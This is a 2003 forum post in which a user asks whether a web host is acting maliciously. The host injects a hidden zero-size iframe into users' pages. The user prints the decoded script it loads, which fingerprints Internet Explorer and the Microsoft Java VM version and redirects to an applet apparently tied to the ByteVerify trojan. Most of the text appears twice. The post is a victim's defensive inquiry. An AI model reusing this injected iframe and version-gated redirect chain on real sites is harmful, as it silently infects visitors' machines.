Quantel
10-30-2003, 10:12 AM
I am sorry to bother you with this, because it might well be just a trivial matter,
but since I do not know much about coding/scripting,
I will ask for help from those who do, you..!
The reason for my suspicion is that a certain "adult host" is inserting a line into all .htm / .html pages its users are uploading / making, this line :
<IFRAME SRC="http://66.250.66.10/new/generic.html" WIDTH="0%" HEIGHT="0%" FRAMEBORDER="No"></IFRAME>
If I download that generic.html file - with a download manager, just pasting it into IE's address box won't do -
I can see that it is a MS Script encoded page.
Then by using the scrdec (http://www.virtualconspiracy.com/scrdec.html) tool, this is what I get out:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
<SCRIPT language = JScript.Encode>
<!--
function start() {
if (navigator.appName == "Microsoft Internet Explorer") {
if (typeof(oClientCaps) != "undefined" && typeof(oClientCaps.connectionType) != "undefined") {
switch (oClientCaps.connectionType) {
case "lan" :
window.location.href = "about:blank"; break;
case "modem" :
var sVersion = oClientCaps.getComponentVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}","ComponentID");
var ss;
var ssnum;
ss = sVersion.split(",");
ssnum = parseInt(ss[2]);
if (ssnum < 3810) {
window.location.href = "http://66.250.66.10/al/alalal.html";
} else {
window.location.href = "404.html";
}
break;
case "offline" :
window.location.href = "about:blank"; break;
}
}
else window.location.href = "about:blank";
}
else window.location.href = "about:blank";
}
-->
</SCRIPT>
</HEAD>
<BODY onLoad="start();" TOPMARGIN=0 LEFTMARGIN=0 BGPROPERTIES="FIXED" BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#808080" ALINK="#000000" STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps">
</BODY>
</HTML>
..and you see the reference to the alalal.html file
- if I download that one, this is what's inside:
<HTML><HEAD>
<TITLE> Archive</TITLE>
</HEAD><BODY>
<APPLET ARCHIVE="archive.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET>
</BODY></HTML>
So I wonder, what does all this stuff do ?
By searching for
08B0E5C0-4FCB-11CF-AAA5-00401C608500
in the Windows Registry, I find that this is the Microsoft Java Virtual Machine, and since this is version 3810, this must be the reason that 3810 "ssnumber" is there..?
...and then we get to the BlackBox.class.
Using Google, the top hit result (http://www.viruslist.com/eng/viruslist.html?id=72440) tells about the BlackBox trojan horse (I think?)
- while further down (http://securityresponse.symantec.com/avcenter/venc/data/trojan.byteverify.html) Symantec tells about how Trojan.ByteVerify are using BlackBox.class
- and even further down (http://forum.java.sun.com/thread.jsp?forum=17&thread=439931&tstart=0&trange=15) someone at Sun (who are the ones who made this BlackBox.class, aren't they? Why did they make it?)
respond to some guy asking about his AV program complaining about the BlackBox.class file inside his Java Plug-in cache folder.
So I wonder, what does all this stuff do ?
Are this "adult host" a bunch of cyber-criminals, or are is it just me who are too suspicious ?
Please help - I really appreciate any comments on this, I will thank you very much in advance.
With regards,
Quantel.
but since I do not know much about coding/scripting,
I will ask for help from those who do, you..!
The reason for my suspicion is that a certain "adult host" is inserting a line into all .htm / .html pages its users are uploading / making, this line :
<IFRAME SRC="http://66.250.66.10/new/generic.html" WIDTH="0%" HEIGHT="0%" FRAMEBORDER="No"></IFRAME>
If I download that generic.html file - with a download manager, just pasting it into IE's address box won't do -
I can see that it is a MS Script encoded page.
Then by using the scrdec (http://www.virtualconspiracy.com/scrdec.html) tool, this is what I get out:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
<SCRIPT language = JScript.Encode>
<!--
function start() {
if (navigator.appName == "Microsoft Internet Explorer") {
if (typeof(oClientCaps) != "undefined" && typeof(oClientCaps.connectionType) != "undefined") {
switch (oClientCaps.connectionType) {
case "lan" :
window.location.href = "about:blank"; break;
case "modem" :
var sVersion = oClientCaps.getComponentVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}","ComponentID");
var ss;
var ssnum;
ss = sVersion.split(",");
ssnum = parseInt(ss[2]);
if (ssnum < 3810) {
window.location.href = "http://66.250.66.10/al/alalal.html";
} else {
window.location.href = "404.html";
}
break;
case "offline" :
window.location.href = "about:blank"; break;
}
}
else window.location.href = "about:blank";
}
else window.location.href = "about:blank";
}
-->
</SCRIPT>
</HEAD>
<BODY onLoad="start();" TOPMARGIN=0 LEFTMARGIN=0 BGPROPERTIES="FIXED" BGCOLOR="#FFFFFF" LINK="#000000" VLINK="#808080" ALINK="#000000" STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps">
</BODY>
</HTML>
..and you see the reference to the alalal.html file
- if I download that one, this is what's inside:
<HTML><HEAD>
<TITLE> Archive</TITLE>
</HEAD><BODY>
<APPLET ARCHIVE="archive.jar" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET>
</BODY></HTML>
So I wonder, what does all this stuff do ?
By searching for
08B0E5C0-4FCB-11CF-AAA5-00401C608500
in the Windows Registry, I find that this is the Microsoft Java Virtual Machine, and since this is version 3810, this must be the reason that 3810 "ssnumber" is there..?
...and then we get to the BlackBox.class.
Using Google, the top hit result (http://www.viruslist.com/eng/viruslist.html?id=72440) tells about the BlackBox trojan horse (I think?)
- while further down (http://securityresponse.symantec.com/avcenter/venc/data/trojan.byteverify.html) Symantec tells about how Trojan.ByteVerify are using BlackBox.class
- and even further down (http://forum.java.sun.com/thread.jsp?forum=17&thread=439931&tstart=0&trange=15) someone at Sun (who are the ones who made this BlackBox.class, aren't they? Why did they make it?)
respond to some guy asking about his AV program complaining about the BlackBox.class file inside his Java Plug-in cache folder.
So I wonder, what does all this stuff do ?
Are this "adult host" a bunch of cyber-criminals, or are is it just me who are too suspicious ?
Please help - I really appreciate any comments on this, I will thank you very much in advance.
With regards,
Quantel.